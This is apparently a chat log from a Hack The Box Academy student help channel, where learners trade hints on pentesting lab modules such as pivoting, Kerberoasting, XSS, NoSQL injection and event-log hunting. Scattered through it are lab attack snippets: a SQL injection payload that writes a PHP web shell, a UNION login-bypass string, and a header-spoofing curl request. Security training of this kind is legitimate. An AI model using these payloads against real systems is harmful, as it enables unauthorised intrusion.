#modules
Would that network segment be down?
I’m on the 10.129.0.0 network so I should be able to get to that network
Hi, I'm doing Web Server Pivoting with Rpivot, where I have to connect to the web server on the internal network. "Submit the flag presented on the home page as the answer." But all I see is the Apache2 Ubuntu Default Page.
If you see that, you should be there. Look closely. Look in different ways, if that makes sense.
I curled it and checked the source code, still no luck.
Any other hint?
Not without giving the answer, unfortunately.
Hey guys,
If someone is interested in a study group about CPTS modules, let me know in DM 💪
thanks mate
Pretty sure I had to curl this one to see the flag, I can't remember exactly.
We have to find another internal network within it.
If that's a spoiler I'll delete but it really doesn't take away from what the learning objectives were
Hey, I'm unable to ping the target machine on my VM using OpenVPN.
Getting error { Remote/Reverse Port Forwarding with SSH }
Read the error.
done
Hi, I'm currently doing the Linux privesc module and need some help understanding the Python library path injection section. For the demonstration, am I just meant to edit the init.py? I'm asking because it says to find a writeable directory so I can create my own module; however, it needs to be higher in priority and I cannot find one to write my own custom module in.
I have a little problem with my Kali machine. When I use the "ls -la" command to list the documents in a directory, it does not list the creation/modification time of the file. I'm still a newbie and I need a little help.
I still can't pick that network, I have to log it with HTB support.
Hi, have you solved this?
Sync your clock with the DC, look it up.
I tried
ntpdate 10.129.203.114
ntpdate dc01.inlanefreight.local
ntpdate inlanefreight.local
Still got ntpdig: no eligible servers
I don't think 10.129.203.114 is the DC, it's usually in the internal network.
Yeah, I used 172.16.8.<> also.
Either ntpdate or rdate, or faketime with the time from nmap.
First make sure you have access to the DC that you want to sync your clock with, add that DC IP and hostname to your hosts file (in this format: <target IP> dc01.inlanefreight.local inlanefreight.local dc01)
After that run this command: sudo timedatectl set-ntp 0; sudo ntpdate -u dc01.inlanefreight.local
(If you don't have either tool installed, just install it with apt-get.)
Read each and every prolab description, or even reviews if you want to go that far, to get a basic understanding of what each prolab is about, but personally I'd recommend the Offshore prolab if you want a big lab with lots of AD, and Zephyr if you just want pure AD.
Guess it's busier because of the holidays. I had no issues on Zephyr, maybe once and I had to wait for the daily reset, but now you can reset individual machines, so it should be even better.
Also switch servers if you're running into problems.
Since the update a while back you can no longer check how many people are on each VPN server, but changing the VPN server usually fixed the issue for me.
hey
Excuse me, I am stuck in the session hijacking module (XSS), can anyone help me? Thanks.
Solved after resetting the lab.
Can someone help me with this question?
Hi, has someone solved the skills assessment of Advanced XSS and CSRF Exploitation?
i have been missen it the box
Can I ask for help with a question here?
You can ask for help here.
Ah, I already asked in community help
Your payload for fetching script.js executes, so the issue should be with the index.php file.
Or the content of script.js is incorrect.
Actually the problem should be the content of script.js, try other payloads for grabbing cookies.
I have a question regarding the Pass the Ticket from Linux section in Password Attacks.
The last section in it is so confusing to me, what is all this port forwarding, proxychains stuff?
why? 😅
What is the question?
Because you wouldn't be able to access the other hosts without that
It's a bit out of left field I guess, since it's before the pivoting module, but for now you can just replicate the steps
If you have a more specific question, I could try to explain
I'm stuck here as well.
PtT uses Kerberos to authenticate; you need to be able to connect to the KDC to request a TGT, so proxychains is used to access the internal network. It's explained more in the AD module too.
What about chisel? So are we just forwarding that port, and then the connections made to that port are being sent through proxychains? 😅
Yeah, I get that, but I would have loved it if they explained it in more detail. I'm hoping it will be explained more in the pivoting module.
Yep, do the pivoting module and it will explain more.
Chisel is a pivoting and port forwarding tool; you're pivoting through a host that has access to the internal network. It will all be explained in detail in the pivoting module, chisel along with many other ways to pivot.
For the purposes of that module, it's just a proof of concept of how it's done, but doesn't go in depth
Hello, wondering if anyone could DM me regarding this question: "Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer." I guessed the answer right but I'm really itching to get a proper answer. Thanks.
Okay, thanks ❤️
Also kinda strange that PtH and PtT are in the module since they're not using passwords.
Similar conceptually; they're still ways to authenticate. I'm guessing the only other place to put it is the AD module, which is big enough as is.
Hashes and tickets are essentially as good as a password
Yeah, I do think those would be a better fit in the AD module, but it's already very long.
It would've been a 48-section-long module.
Don't remind me of that, pls.
I'm already bad at Windows and AD and hate it, I'm feeling scared getting closer to it.
It perfectly explains anything that probably scared you, so be eager instead 😂 It's the best part of the pentester path imo.
I mean I am excited for it, but still afraid 😂
That module will get you better at AD, take your time with it.
Uni got the time part DW
Hi, can someone help me with the Windows Attacks module for Kerberoasting (first question)? I'm stuck on trying to crack the hash. I already transported the spn.txt file to the Pwnbox. The part that I'm stuck on is after the hashcat from spn.txt... am I supposed to replace passwords.txt with the "Hint" directory?
Yeah, you should use rockyou.
I'm doing the lateral movement/pass-the-ticket section of Password Attacks and am a little confused. We grab the ticket encryption keys and combine them with a user NTLM hash to create a forged user TGT, right? So any services we request are made as that user, with their standard permissions?
I guess what I am asking is that all of the ticket forging/pass the ticket is for local, lateral user movement, correct?
Understandable
The only module, rather section, that has me a bit worried in advance is the Attacking Thick Client Applications section, and I'm only 2 sections away.
Yes, though not sure what you mean by encryption key and combine with NTLM; NTLM is the encryption key.
The NTLM hash of the user password is the encryption key for the tickets?
The ticket request, yes, not the TGT.
Hey, on the Footprinting medium lab, I've mounted the NFS but when I try to access the TechSupport file it says that I do not have permission.
Is that correct?
Hey, a question: in the BROKEN AUTHENTICATION module ----> Weak Bruteforce Protections section, I run the script they give you to perform bruteforce adding the X header, but it does not detect any valid combination.
Navigate with su privs.
Focus on the X header and not bruteforce.
What section is that?
@lusty thicket file upload attack assessment
I already put the X header and used the credentials you found in the previous question, but nothing.
You have to apply brute force, right? Or are the credentials the same and the only thing that needs to be changed is the IP?
The only thing to be changed is the IP.
You don't need to bruteforce.
I recommend curl.
You need the green.
Pro tip - always upload just an image.jpg first, then intercept with Burp and start to mess around/pass to Intruder.
You are getting that result (which you should've noticed) because your file doesn't pass the blacklist check/client-side check.
curl -s -X POST "http://83.136.250.104:40025/question2/" -d "userid=advantech&passwd=admin&submit=submit" -H "X-Forwarded-For: 192.168.1.100"
Okay, let me go back - ty for the advice.
Won't it be like that?
Windows privesc, Citrix breakout question: I am unable to access shares from my Kali. Is this a lab issue or a skill issue?
@supple gorge I figured it out lol, I was using the walkthrough IP and not the target IP with the specified port hahaha, such a noob I am. 😂
I'm struggling with "MODERN WEB EXPLOITATION TECHNIQUES - SSRF Basic Filter Bypasses". Is someone available for PM? I think I am misunderstanding how the command reaches back to my machine.
The Citrix target can only access the Ubuntu machine.
OHHHH MAAAN
I knew I was doing something stupid but this is the no-brain-cell moment for me.
Hi there, I'm stuck with the question of Env Enum from Linux Privilege Escalation, any hint would be really appreciated...
Is Academy down for anybody else? Getting an error message. I've been working on it for about 2 hours and got an error when I submitted an answer, so I refreshed the page and got this:
Error Code: 502
Got the same error a minute ago.
Thanks, I thought I broke it or something lol
Hi
Same, just a minor blip lol
Luckily it didn't impact deployed machines, as I just finished the final footprinting lab!
find and grep
In this case you know how the "sensitive" data should look.
@sly dome with find & grep I found a protected file.
I would start with THM, working through their Advent of Cyber calendar and then check out some of the modules on HTBA
That too
It happens, glad you figured it out.
@sly dome can I DM so as not to spoil here?
Check your IP.
something like that
Hello, I need help at USING WEB PROXIES -> ZAP Scanner. How do I get the high-level vulnerability? I need a hint. EDITED: I found it, I used ZAP locally.
Now I'm getting the same error on the Ubuntu IP.
Make sure the SMB server is running and the IP is correct.
Can someone teach me to hack?
If it's even possible for me, because I'm on an iPad.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
thx
Hi, I have a question about Footprinting Lab - Medium, can anyone help with NFS share permissions?
nvm on my ask - I figured out the issue.
Hi, I am on this SA right now, what tool did you end up using? I have found all the same information you mentioned:
username, 500 error codes with certain payloads in the password (and username) parameter, and the /token page does not error the same way as the other endpoints (i.e. missing parameter error).
Switch to root and you can access
Roger that, did the job, thanks!
How long is this command usually supposed to run:
"Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y"
https://academy.hackthebox.com/module/143/section/1420
Until you have captured the hashes, same as Responder.
How long did that take you?
Don't remember, did that module a long time ago. Open another terminal to cat the file.
In the IMAP/POP3 module, for the question "What is the admin email address?", I try to connect to the IMAPS server but then all the commands I enter come back with * BAD Error in IMAP command received by server.
It should take about 5-10 minutes to grab all the hashes required - let it sit for a few.
IIRC it's interactive: if you hit q you can run the outlined commands to check info from the section @cedar void
It's either Invoke-Inveigh or Inveigh.exe that's the interactive one.
IMAP commands need to be prefixed:
1 <command> <args>
as shown in the example commands given.
I linked to an article a long, long time ago when I was going through it that goes over the full commands in more detail.
I tried several: 1, *, A1...
e.g. 1 LIST "" *
Are you logged in as the user?
Also, there is no IMAP/POP3 module, are you referring to the Footprinting module, with the section IMAP/POP3?
Yes, correct. Sorry.
Hey, I'm at the Windows Event Logs & Finding Evil
Skills Assessment and I'm not sure I understand.
Maybe it's a dumb/unclear question, but if someone can DM me I can give more details.
What command are you exactly running? You should be able to check most commands, but like I said, if you're not logged in as a user it might not let you.
I think that is the problem. I'm trying to figure out how to log in but don't know the user/pw.
Read the section carefully, it gives you the username and password.
Hint: it's related to the user you enumerated in SMTP.
:)
I can't give too much there since it's a part of the answer
Ok, my bad.
There is a #homelab-sysadm channel that you will be able to access if you read and follow the instructions; that'll probably be the better place to ask.
That, or #1024429874246590575 if you're lazy, but I can't guarantee there will be someone to answer.
ok thanks
In this module, what document viewer should we use?
I have the password of the .docx, but the Atril Document Viewer on the Pwnbox doesn't support the file with a password.
Try with LibreOffice.
Let me install it, then try.
Hi, I'm learning the Footprinting module and I'm stuck on the SMB section. How can I access a share folder with rpcclient?
I tried the netshare command but it doesn't work.
rpcclient isn't for enumerating shares iirc; just use smbclient.
smbclient //IP/folder
smbclient -U "" -N //IP/share
Thx. I didn't see that.
A mistake installing it using the official guide.
Hi, I'm facing an issue.
Once I'm spawning a target I don't see the IP.
On the top left I can see the active target.
When I'm trying to start one more time I'm receiving an error saying "You don't have enough permissions to create a genesis."
Can anyone help?
I re-logged, cleared cache etc., nothing helped.
Should just be able to do sudo apt install Libre-office or office-libre or whatever it's called.
I also think it SHOULD be there by default.
Yes, but it also works when leaving the pw blank through the prompt.
-N tells it not to ask for a password.
;)
Yeah, I know 😄
└──╼ [★]$ sudo apt install libre-office
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package libre-office
└──╼ [★]$ sudo apt install office-libre
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package office-libre
Found the correct one, libreoffice.
👍 Generally it's best to install things directly through APT to avoid dependency issues, as sometimes the website holds a later version that is on a different dependency.
ty y'all
LibreOffice is also having issues on the Pwnbox with apt.
If it's not already installed by default, idk what to tell ya bud ¯\_(ツ)_/¯
I use my own VM so I haven't cared much about the Pwnbox dependency stuff.
Okay, might try and transfer the document to my main Windows desktop.
Maybe it's time to make a Windows VM.
Sadly I can't utilize the VPN due to high latency.
Fun fact: you can SSH to the Pwnbox and use scp to copy files.
Generally don't transfer unknown stuff to your host; Academy stuff is safe, but it's still best practice.
In the format scp pwnboxid@pub-ip:/path/to/file ./ I believe most current versions of Windows have ssh installed by default.
But it doesn't take long to figure out how to install it.
Didn't know that, thanks.
Unfortunate, but I take it you've tried other regions for the VPN latency issues; you're not in the US or EU, I'm gonna assume.
Yes
I believe it's the Pro versions of Windows which have it installed by default.
It's a specific version # and after that they have it installed, if I'm remembering the dumbshit wheel.
Creds for your Pwnbox are on the desktop btw.
Could someone help me understand how billing discounts for Cubes are calculated? Under 'Purchase Cubes', I see I can purchase 200 cubes for $20. Under 'Monthly Billing' in the Silver plan, I see 200 cubes each month for $18, which amounts to a $2 discount over the 200 for $20 price (a 10% discount). However, the Silver billing plan lists this as an 11% discount. How did they come up with 11%?
I am at Using Web Proxies -> Skills Assessment, question 3. I need to add one alphanumeric char to the 31-character cookie and I need to encrypt the whole cookie, but how can I add the char and encrypt the cookie in one go in Burp Intruder? I tried 'cookie=§3dac93b8cd250aa8c1a36fffc79a17a§char§§' as a payload in Burp, but in this case only the char is not a payload. How does this work?
I'm still having problems in Windows Event Logs & Finding Evil, Skills Assessment.
By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe
I'm not sure I understand how to do this correctly. There are a lot of logs and, since I'm not the one doing the DLL injection like in the exercises, I can't really search for a specific DLL or process.
Knew it, thanks anyway.
Finished the medium lab
Starting the hard one.
Why can't I ping the target IP from the Pwnbox?
Possibly the target has a firewall, depends on the room
In the Footprinting module, chapter DNS, I don't understand the question clearly.
"Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain."
What do they want as an answer?
The FQDN of the DNS server.
What am I missing here? If I buy 500 cubes, I pay $50. If I buy a Gold plan for 1 month (which includes 500 cubes), I pay $38. That's a 50-38=$12 discount, which is 12/50*100=24% discount. The Gold plan says it's a 27% discount. Are the cubes in the Gold plan valued differently from the cubes I purchase separately? @Wnted's earlier linked answer didn't seem to answer this question.
I was reading recently that there are some better promotions. Buying a plan is better if you can. Even buying something like the Gold gives you lots of access. It can open up everything for a path and you get an exam voucher. Unless you are a student, where it is like $8 USD a month and you get access to everything Tier II and below included.
A month of Plat + a month of Gold gives you access to a full path iirc, don't read into the % discount too much.
I think the exam voucher is only included in the Annual plans, not the Monthly plans. If the "Unlimited Pwnbox usage" that comes with the Monthly plans somehow increases the value of the cubes (if it costs more cubes to use a Pwnbox if you're not on a monthly plan) then I could see why the discount could be viewed as a higher percentage. However, the Academy FAQ section says that "buying any amount of cubes in Academy's billing page" gives "unlimited Pwnbox access", so that explanation doesn't make sense. My guess is that their discount percentage information is just out of date, which would not surprise me given that some of the links in the FAQ page don't even work any more (like the one at the end of the 'What is HTB Academy?' question).
Just do Platinum, it's the best deal, unless you can buy Gold annual right now with the discount and will be super committed the coming year.
I believe the % discount is based on some old stuff they were doing.
That is the point I was making. It does not make sense at all. If you break it down, it might be cheaper to get cubes. They seem to have specials. I would not worry about discounts, like previously said. Get what you can afford. Or use an old school email, lol.
It still ends up cheaper even adding the $210 for the voucher.
Annual plans aren't really worth it.
*Gold annual, but yes, this.
Yes, my bad, will edit
Thanks. Sounds like good info. One more question: if I buy a Monthly (Gold?) plan which gives me 500 cubes, what happens if I don't use them all by the end of the month - do I lose them, or do they carry forward into the next month?
You won't lose the cubes, spend them whenever you want.
With a student plan, you do not need to worry about the cubes for lower tiers, and bank the cubes you win to get the better items.
Yes, it does look like the info on the billing page is old. I just came across some updated information ('Updated over a week ago') in the Help section: https://help.hackthebox.com/en/articles/5720974-academy-subscriptions in which it refers to a 10% discount for Silver, and 24% for Gold, which matches my calculations.
Trying to determine the CMS in the active recon.
IIRC there's some flags you can use with whatweb to give more detailed info, it's in that section I believe.
Thanks... I'll dive into whatweb deeper.
It took me over four hours to get past SQL Injection Fundamentals. The shell is what was giving me the most issues for some reason. Did anyone else have issues getting the flag that was "one directory away"?
Which wordlist should I use in the Footprinting / DNS last question?
Upgrade to a better shell if you're using the shitty injected webshell.
I was following the instructions because I thought we had to. I was using the shell.php one we are told to create. I could have sworn I had done other modules that were much easier getting in there.
If you have that you can just use a revshell one-liner, makes it much easier to do anything.
Can someone help me with skills assessment 2 for the 'Introduction to NoSQL Injection' module? I have found the following information right now and could use a nudge ||1. enumerated username 2. 500 error codes with certain payloads in the password (and username) parameter on /login. 3. /token page does not error the same way as the other endpoints (i.e. missing parameter 200 error). ||
Got it. I will try that next time. Right now, I am going through the whole program getting the gist down, and will go back over everything to make sure I get it done. I hope to get to the big boxes soon, lol. An example of what they showed was cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'--
So you have username / password?
If I remember right, go to the password reset page and look for the missing parameter name.
Should just be the one given in the section.
The hint says that different wordlists may have different entries.
I just have a username from the /forget endpoint, but no password. Doesn't look like there is any other parameter other than the 'token' param.
Try the others in that dir then, dns-Jhaddix should have it.
I'ma look up my scripts, sec.
2 hints: subdomains of subdomains, and be fierce.
Use the fierce wordlist from SecLists.
thanks
The /login endpoint is right.
I made a script that uses some JavaScript injection in the username value.
Basically nearly the same script as shown in Automating Server-Side JavaScript Injection.
Ok, is there even a point to the /reset endpoint?
Yes, that comes later at the end.
It's nearly 1 year ago since I did this module, so don't nail me down.
As I remember it: || extract username, then request a pw reset for this username, extract the pw-reset token, enter a new pw, login as that user ||
@lusty hearth
@buoyant escarp would you mind dming your script to me for the ssji? because it doesnt make sense to me why I would need to log in, then reset an account.. unless its for some super user privs or information that will enumerate me further for the flag
@lusty hearth sent
ty
Thx, I'ma try.
Trying to get a successful whatweb scan against app.inlanefreight.local.
Getting errors.
Anyone around who can give a nudge/assist for the predictable reset token in the Broken Auth module? I've tried every permutation of approach I can think of and I'm still spinning my wheels.
Trying to scan this vhost app.inlanefreight.local with whatweb.
I keep getting errors.
ty
I still need help.
Read the section again, you should see what to look for.
Can I DM you?
Well, you can just post here.
It's probably a part of the answer so I don't think I can post it here.
So I did this command || Get-WinEvent -Path 'C:\Logs\DLLHijack\DLLHijack.evtx' -FilterXPath "*[System[EventID=1]]" | Select-Object TimeCreated, Message | Format-Table -AutoSize || But I'm not sure if the event ID I'm specifying is the right one. If I've understood correctly it should be this one, since I can't find any ID 7, probably because of spoofing, and I'm not sure how I would know which one of them is the DLL hijack between all the results. Do I need to check for each process which DLL is supposed to be executed?
Need ID 7.
Did you open the logs correctly?
But when I check the logs with ID 7 I get nothing, and I have || put the ImageLoad to exclude ||
If you correctly open the logs in Event Viewer, you'll see 7.
Don't open it from File Explorer.
Need to open it from within Event Viewer.
Ok, I think I did something wrong, because now I see them.
But I'm still not sure I understand how I am supposed to know which one in these 800 logs is the DLL injection. I don't get that much information in Event Viewer. And I don't really have tools to get non-real-time information.
Go back through the section in that case.
I already did that a lot of times and I don't get it. Do I just need to search for || wininet.dll ||?
Look at the section.
There's a difference between the correctly signed-by-Windows event 7
And the one with the find calc.exe
Yeah, I've tried it but I found nothing not signed.
|| <QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID=7)]]
and
*[EventData[Data[@Name='SignatureStatus']='Unavailable']]
</Select>
</Query>
</QueryList> ||
||Just filter event ID to 7 and use Find for Unavailable?||
I'm in Footprinting/SMTP, second question. The hint says it provides a wordlist so I can check for existing users, but I don't see which wordlist? Am I blind?!
In Resources
There's a footprinting wordlist.
Ahh, thx.
Makes sense, I was searching too far for no reason.
But when I enter || mmc.exe || it's not the answer.
Because it isn't.
Should I enumerate manually by typing VRFY username when connected to SMTP via nc or telnet?
Can someone help me with a general problem happening rn?
Is that general problem module related?
uuuuh yee
What module and section?
Linux Fundamentals
Read the section again.
Cool, what's the question?
On files and directories.
So I'm doing the questions but I can't get past it, because as of now I'm trying to connect with SSH
but there is no port 22 on the IP.
I already tried diff IPs to connect to the target but it's giving me the same error :'{
You mean the part with the web proxy, then automate it via HTTP?
I mean the part where they use Metasploit
Or the part where they use smtp-user-enum
But for the latter you should use -w 25, otherwise it won't find it.
Msf should have no issues.
Oh okay, in this section there is no mention of Metasploit, so I didn't use it.
@thorn urchin should I try and connect with another VPN? 0.0
It's not under "footprinting the service"?
What are the exact connection instructions it gives you?
Trying to connect with SSH, I'm restarting my VM rq =.= I'll tell you the message exactly.
Might have put it in my notes myself.
You're right, it's not in the section.
@thorn urchin "ssh: connect to host 10.129.93.88 port 22: No route to host"
Anyways
That was weird 🤓
Alright then, I'm just using Metasploit.
No, I asked exactly what the section instructions for connection were.
In msfconsole you can use auxiliary/scanner/smtp/smtp_enum
I've not done the Linux Fundamentals module, so I want to know exactly what it said before I can give accurate advice.
Excuse me for being a bit of a freshy >.< but it's section 79, File Descriptors and Redirections.
All the questions require you to connect to the target with SSH.
It would work fine with every other section but this one.
ty
Then yeah, I would redownload and connect with the VPN again.
Make sure to kill all other OpenVPN connections first.
Ahh okioki, I'll try that rn 🫡
I'll tell you what happens.
Yippeee, it worked :P, I changed server and reset the target IP.
tyty @thorn urchin
np
I just read the module again and I don't get it, it's || mmc.exe || that's identified as the image.
Man, that SMTP is slow to scan.
It's not that.
Did you filter ID 7 and use the Find function for Unavailable?
Yes, I did.
You only get 1 result?
I get multiple results but they all gave me the same things.
example || Image loaded:
RuleName: -
UtcTime: 2023-12-28 13:01:00.651
ProcessGuid: {52ff3419-718b-658d-2c01-000000001000}
ProcessId: 7772
Image: C:\Windows\System32\mmc.exe
ImageLoaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll
FileVersion: 4.8.4536.0 built by: NET48REL1LAST_C
Description: .NET Framework
Product: Microsoft® .NET Framework
Company: Microsoft Corporation
OriginalFileName: System.dll
Hashes: MD5=AEDE4CAA11B58AC71D6CC7131FB025AB,SHA256=59827DC145773F249AFFDB1B480F9F00A43C544CCDA8CA6728BC7197A2F0C652,IMPHASH=00000000000000000000000000000000
Signed: false
Signature: -
SignatureStatus: Unavailable
User: DESKTOP-NU10MTO\Administrator ||
I'm starting the machine.
Can someone give me a hint or so on how to complete the Advanced Command Obfuscation section of the Command Injections module? I ran this so far but nothing. My Base64 is on the right in the text starting with find... assuming find is a command like cat and not just something else.
I just did a refresh, I got other processes but they don't work either.
I found it without issue
Did you open the log file with "Open Saved Log" within Event Viewer?
DLLHijack log file
I filtered event ID 7
Used Find to search for Unavailable, 1x Find Next had the answer.
Just found it
I don't know why I wasn't seeing it before
I tried a couple of them and finally found the one
Thanks for your time
Hi guys, having some trouble with Abusing HTTP Misconfigurations, advanced cache poisoning attacks. Seems like my payload is getting HTML-escaped. Any advice? Thanks!
Anyone working on the ADCS module?
I've done it, what's up?
Not stuck, but that Active Directory is a little too hard lol
You get used to it over time.
That's for sure, but you'll have your moments lol
embrace them 
Definitely
Hi, about "Injection Attacks - Skills Assessment", my ||pdf|| injection is filtered and I cannot bypass it, could I get some help?
Good evening everyone, I'm a fairly new member to HTB but have completed Tier 0 of Starting Point. That being said, Tier 1 Responder is giving me some hassle. I am attempting to use Responder, but when I type in the website mentioned on page 8 of the walkthrough, it loads the correct website but Responder doesn't pick up the traffic, so I cannot progress. Has anyone else gotten stuck on it?
Edit: I see a better place to take this so I'll move the question there.
Stuck in the last step of Exploiting Web Vulnerabilities in Thick-Client Applications, SQL injection.
Question: why does john sometimes exit sooo fast?
I'm doing the protected archive section in Password Attacks,
tried a couple of wordlists, mutations, but john exits directly after the command, why? 😅
Solved it!
But I'm still wondering why john sometimes exited directly?
I remember that one. My notes only say to follow the steps closely. I think I had to redo it a few times to make sure I was following what was outlined properly. Also, one thing that tripped me up when I was redoing steps and not restarting is when moving files; I thought I was moving and replacing contents with those that were compiled, but wasn't already.
Could someone give me a push in the right direction for the Windows Event Logs & Finding Evil - Skills Assessment Q3?
Y'all know why the target site won't work for https://academy.hackthebox.com/module/35/section/227
@burnt stone
Or anyone
Who can help
hi, this module said we need modif htb/fatty/shared/resources/User.java file, in public user
but there are a lot public user, should i modif first function then delete the rest ?
Stucked on LINUX PRIVILEGE ESCALATION: Containers
Question:
Escalate the privileges and submit the contents of flag.txt as the answer.
I tired as per the module says but when I run the last command it always says Error.
Can anyone help in this ????
I don't recall exactly which one I replaced for that. I don't recall deleting the others. There was one I believe that was used for setting the values in the parameters.
Ahhh found the solution
ok, i'm not deleting the others
this one right ?
then
C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java
then
cp fatty-client-new.jar raw\fatty-client-new-2.jar
extract
then
mv -Force fatty-client-new.jar.src\htb\fatty\shared\resources\*.class raw\htb\fatty\shared\resources\
then
jar -cmf META-INF\MANIFEST.MF traverse.jar .
run
login with
abc' UNION SELECT 1,'abc','a@b.com','abc','admin
Spoiler!! use ||/bin/sh||
I completed the footprinting lab easy, but only because I read a tip to use FTP with a certain port, I'm just wondering where was I able to get this information without the help of a hint from here?
Always look at all the ports and then think about what you can do with them.
Every non-standard port is worth a closer look.
nvm solved
So Nmap port scan and figure out there's a strange port ?
Not necessarily strange, just non-standard
Thanks, this helps with future tasks 👍
Hello i need help in digital ossian website? Anyone
Which HTB Academy module is this?
I don't know whether the time in the header and the time displayed on the website are the same.
The time you need to use is displayed on the website
Processing a curl they seem to be the same
So I have to get the time shown on the web?
When you are on the website, you can click a button, right? This generates two tokens. It shows you the time and tells you that the other token was generated within +/-1 second
hi guys. Sorry for the simple question but im on module 'Windows fundamentals' section 'skills assessment.'
I'm tasked with making a security group called HR but I can't figure out how to do it.
I tried following the steps in this link but I couldn't navigate to anything it asked me to: https://its.uark.edu/campus-it-resources/identity-access/active-directory-ou-security-groups.php
Can I talk to you via DM?
I am only online very sporadically.
If you can wait until tonight, you are welcome to send me a DM.
So.. i have finished the entire for the Windows Event Logs & Finding Evil - Skills Assessment except Q3... could someone give me a hint in the right direction?
should be in the module but either https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11) use the command line or Computer Management from the GUI
the link you found applies only to domain-joined machines
much appreciated man ty for taking the time to reply
Footprinting Lab - Medium: Trying to log into the SQL server, is it somehow down, or am I doing something wrong:
hi, i just finished that section too. so for now, there is no need to understand how the proxychains and chisel work but just replicate the steps? it will be taught further down the road?
pivoting module will go into detail on those
ok thanks!
try running as admin
Started course: Windows Fundamentals, but I have a problem with keyboard layout in windows machines. So the keyboard is probably American one, but I live in Europe and my keyboard is with Nordic layout so I can't really type special characters and it sucks. I tried to change keyboard layout from the windows machine itself but it is not connected to the internet so I couldn't do that. Any solutions?
run the application as admin with the sa creds you found
Module name: Windows Local Password Attacks / Credential Hunting in Windows
I am struggling to find the password Bob uses to connect to the Switches via SSH.
I've uploaded laZagne and run the find command so I am pretty sure i've uncovered all of the files - but I can't find any passwords that i've not already tried before
Is somebody please able to help?
Damn I'm lost, I only found Alex's credentials not admin
there’s a important.txt file on that host
just look around files and folders manually, you don't need lazagne for this
Thanks for the nudge, I've got all the other questions answered and this is the last one! I thought I had it a few times but I can't find anything relating to the two ssh commands bob uses
it's just in a file in a very conspicuous folder, think it was even pinned to Quick Access
Thank you!
Use what you’ve learned from question 2
okay figured it out, what a dumb issue. ctrl + alt + 2 would not work so had to change to korean keyboard 😅
Thanks got it.
More issues with footprinting lab - Medium: I'm now logged in the mssql, but all I get is columns as results, no data seems to be in the database, what am I doing wrong now? select * from dbo.accounts;
this gives me empty columns; name | id | password
read the hint
drawing blank, I'm logged in as administrator and I need to log in as another admin?
you’re logged in the right account now you just need to find the right query for the information you’re looking for
this is insane, I went to hell and back just to get here lol
Accounts is not the right table
It's the only table under the entire WINMEDIUM, I'm in the right place though ? Never used this mssql before
It says dbo.devsacc in my notes
Seems like it does not exist:
Let me start up the box
It's here though:
did you USE <database>
Does nothing, and cant find the database
or SELECT * from [accounts].[dbo].devsacc
you need to fill in the database name yourself
Works fine for me
This is weird, mine would not work with this exact command, but managed to get it to work with: SELECT * from [accounts].[dbo].devsacc. I don't know what was the problem there, clearly am not familiar with the syntax, thank you all for help, managed to get it 👍
Jesus, what's the hard one going to be like 😶
that's probably because you didn't choose the DB to use, but yes it's a syntax problem
if you have selected the DB then select * from dbo.devsacc should work
Ahh, so I should have done like use accounts; or something similar?
yep give that a try
Hey, I am at Using Web Proxies at the Skill Assessment, question 3. I need to add a char to the 31 characters long cookie and then I need to encrypt the cookie in reverse order. But how can I add a char to the cookie and encrypt that in one step? I tried this in burp intruder §3dac93b8cd250aa8c1a36fffc79a17a§char§§ but in this case only the 'char' outside of the range. How can I do this?
try aHR0cHM6Ly95b3V0dS5iZS9kUXc0dzlXZ1hjUQ==
base64
how did you get this?
did you decrypt it? then you know it
yeah that's really useful, thank u xD
use CyberChef, it is very useful
don't you know it either? How do I use Burp Intruder so that this works?
They're messing with you, just a rick roll, super original
Not on the computer right now to check my notes but I tinkered with intruder and custom iterator
oh this was the wrong question, use the wordlist "alphanum-case.txt" and try 3dac93b8cd250aa8c1a36fffc79a17a§char§ and i don't remember correctly but you need to set up payload encoding
in this case I encode only the §char§, but I need to encode the whole thing, 3dac93b8cd250aa8c1a36fffc79a17a + the §char§
Can someone who has finished the SERVER-SIDE ATTACKS module help me I can't even install it
it wasn't payload encoding. set a payload processing rule: add -> hash md5
the payload is only the §char§, not the whole cookie. Is there a possibility to encode the whole cookie in burp?
@lusty thicket I'm doing it from the beginning. If not, can you help me?
i may be able to help if i knew the problem
attack type cluster bomb, payload 1 the char using the wordlist, payload 2 the whole cookie using md5 hash
@lusty thicket I did everything from the beginning and this time it worked thanks
but this does not show up correctly: cookie=§3dac93b8cd250aa8c1a36fffc79a17a§char§§, this §3dac93b8cd250aa8c1a36fffc79a17a§ is one payload, the second payload is empty §§
oh i see, then i don't know.
have you tried reading the htb forum? sometimes it is very useful
I try that out, thank you
No problem
@lusty thicket
upstream tomcats {
server 94.237.62.195:43552;
keepalive 10;
}
server {
listen 80;
location / {
ajp_keep_conn on;
ajp_pass tomcats;
}
}
I added my file into nginx.conf but
type sudo nginx
nginx: [emerg] bind() to 0.0.0.0.0:8080 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0.0:8080 failed (98: Address already in use)
I'm getting errors
http {
upstream tomcats {
server 94.237.62.195:43552;
keepalive 10;
}
server {
listen 8080;
location / {
ajp_keep_conn on;
ajp_pass tomcats;
}
}
my configuration is like this
Is anyone able to help me with the module Attacking Common Applications - Attacking Thick Client Applications? I've been stuck on it for ages and can't seem to get the same results shown in the module, I can't even find any MAP - RW within the memory
is this from the pwnbox?
follow the exact steps as the section
i have been and i doubt i missed anything, i changed the permissions of the temp folder as it said, changed the preferences of the debug app, ran the application a few times, everything, and nothing past the memory dump part
also check walkthroughs for the fatty box
